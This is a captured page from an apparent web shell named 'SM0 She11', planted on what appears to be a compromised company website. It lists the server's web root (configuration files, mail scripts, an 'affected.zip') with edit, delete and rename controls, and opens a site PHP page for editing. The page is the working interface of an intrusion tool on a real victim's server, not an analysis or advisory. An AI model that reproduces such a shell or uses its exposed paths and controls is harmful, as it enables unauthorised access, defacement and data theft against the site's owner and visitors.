SM0 She11
Path:
/
/
home
/
saienerg
/
public_html
Full Path (server): /home/saienerg/public_html
Create Fil3
Upl04d Fil3
📄 .DS_Store
[E]
[D]
[R]
📄 .ftpquota
[E]
[D]
[R]
📄 .htaccess
[E]
[D]
[R]
📄 .htaccessold
[E]
[D]
[R]
📄 .user.ini
[E]
[D]
[R]
📁 SpryAssets
Open
[D]
[R]
📄 about-ramesh.php
[E]
[D]
[R]
📄 about-sivakumar.php
[E]
[D]
[R]
📄 about-thangaraju.php
[E]
[D]
[R]
📄 about-venkat.php
[E]
[D]
[R]
📄 aboutus.php
[E]
[D]
[R]
📄 affected.zip
[E]
[D]
[R]
📄 careercopy.php
[E]
[D]
[R]
📄 careerpost.php
[E]
[D]
[R]
📄 careers.php
[E]
[D]
[R]
📄 careersapplynow.php
[E]
[D]
[R]
📄 careerslocation.php
[E]
[D]
[R]
📄 cat-photo.php
[E]
[D]
[R]
📄 class.phpmailer.php
[E]
[D]
[R]
📄 class.smtp.php
[E]
[D]
[R]
📄 clients.php
[E]
[D]
[R]
📄 cmn_lib.php
[E]
[D]
[R]
📄 contactus.php
[E]
[D]
[R]
📁 css
Open
[D]
[R]
📁 demo
Open
[D]
[R]
📄 enquiry-omservice.php
[E]
[D]
[R]
📄 enquiry-otherservice.php
[E]
[D]
[R]
📁 enquiryupload
Open
[D]
[R]
📄 error_log
[E]
[D]
[R]
📄 event-details.php
[E]
[D]
[R]
📄 eventslist.php
[E]
[D]
[R]
📁 fonts
Open
[D]
[R]
📄 gallery-album.php
[E]
[D]
[R]
📄 gallery-photo.php
[E]
[D]
[R]
📄 gallery-video.php
[E]
[D]
[R]
📄 google11bb5e94a094932d.html
[E]
[D]
[R]
📁 images
Open
[D]
[R]
📁 img
Open
[D]
[R]
📁 include
Open
[D]
[R]
📄 index.html
[E]
[D]
[R]
📄 index.php
[E]
[D]
[R]
📄 index1.php
[E]
[D]
[R]
📁 intra
Open
[D]
[R]
📁 js
Open
[D]
[R]
📄 mail.php
[E]
[D]
[R]
📄 peformance_archives.php
[E]
[D]
[R]
📄 per-articles.php
[E]
[D]
[R]
📄 per-experiencelist-pre-OEM.php
[E]
[D]
[R]
📄 per-experiencelist-pre-direct.php
[E]
[D]
[R]
📄 per-experiencelist-services-dis.php
[E]
[D]
[R]
📄 per-experiencelist-services-energy.php
[E]
[D]
[R]
📄 per-experiencelist-services-special.php
[E]
[D]
[R]
📄 per-experiencelist-services-trou.php
[E]
[D]
[R]
📄 per-experiencelist.php
[E]
[D]
[R]
📄 per-listofcurrent.php
[E]
[D]
[R]
📄 per-monthlyperform.php
[E]
[D]
[R]
📄 per-servicecap.php
[E]
[D]
[R]
📄 php.ini
[E]
[D]
[R]
📄 products-details.php
[E]
[D]
[R]
📄 products-details1.php
[E]
[D]
[R]
📄 products.php
[E]
[D]
[R]
📄 products1.php
[E]
[D]
[R]
📄 products_old.php
[E]
[D]
[R]
📄 service.php
[E]
[D]
[R]
📄 site.js
[E]
[D]
[R]
📄 site.php
[E]
[D]
[R]
📄 ssl.php
[E]
[D]
[R]
📄 testmail.php
[E]
[D]
[R]
📄 top-footertop.php
[E]
[D]
[R]
📄 top-side-serviceslist.php
[E]
[D]
[R]
Editing: per-articles.php
<!DOCTYPE html> <html lang="zxx"> <head> <?php include ("include/top-header.php");?> </head> <body> <?php include ("include/top-headerlogo.php");?> <div class="section banner-page about"> <div class="overlay"></div> <div class="container"> <div class="row"> <div class="col-sm-12 col-md-12"> <div class="title-page">Articles</div> <ol class="breadcrumb"> <li><a href="index.php">Home</a></li> <li class="active">Performances</li> </ol> </div> </div> </div> </div> <div class="section feature overlap"> <div class="container"> <div class="row"> <div class="col-sm-6 col-md-9"> <p>Our Team of Experts are not only performing their regular tasks and they wish to publish their experiences, challenges, technical innovations and research findings as Articles to the entire fraternity of their Profession. It will give support and help the younger generations to understand and learn the facts and to carry forward further.<br> The List of Articles is given in the Table below and to view the individual Articles we can click the PDF Icon and read the content. </p> <table class="table table-bordered table-condensed" width="100%"> <tr class="t-head-1"> <th width="8%">S.No</th> <th width="15%">Post Date</th> <th width="67%">Article Name</th> <th width="10%" class="text-center">PDF</th> <tr> <?php $tsql="select * from articles_list where status ='1' order by art_id DESC "; $tqry=mysqli_query($idb,$tsql)or die(mysqli_error()); if(mysqli_num_rows($tqry)>0) { $sno=1; while($row=mysqli_fetch_array($tqry)) { ?> <tr> <td align="center" style="text-align:center"><?php echo $sno ?></td> <td><?php echo $date = date("F Y", $row['crt_stm']); ?></td> <td><?php echo $row['title']?></td> <td class="text-center"> <a target="_blank" href="intra/assets/docs/articles/<?php echo $row['art_doc'] ?>" class="btn btn-danger"><i class="fa fa-file-pdf-o"></i></a></td> </tr> <?php $sno=$sno+1; } } ?> </table> </div> <div class="col-sm-6 col-md-3"> <?php include ("include/top-side.php");?> </div> </div> </div> </div> <?php include ("include/top-footertop.php");?> <?php include ("include/top-footer.php");?> </body> </html>
Save